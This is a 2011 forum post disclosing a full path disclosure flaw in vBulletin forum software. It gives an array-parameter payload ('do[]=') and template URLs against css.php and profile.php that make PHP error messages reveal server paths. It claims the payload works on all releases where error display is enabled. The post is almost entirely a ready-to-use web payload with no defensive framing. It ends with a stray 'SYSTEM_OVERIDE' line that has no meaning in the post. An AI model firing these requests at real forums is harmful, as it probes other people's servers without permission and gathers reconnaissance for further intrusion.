vbulletin Full Path Disclosure Vulnerability

Started by Bl4k3, May 22, 2011, 03:28:08 AM

Previous topic - Next topic

Bl4k3

vbulletin Full Path Disclosure Vulnerability

  • Vulnerability:

    Quote.php?do[]=

  • Examples:

    Quotehttp://[SITE].COM/[FORUM_DIRECTORY]/css.php?do[]=
    http://[SITE].COM/[FORUM_DIRECTORY]/profile.php?do[]=

  • Tested on vBulletin 4.0.7 - Should work on all releases till date -
  • Wont work if errors are disabled via php.ini or httpd.conf -

SYSTEM_OVERIDE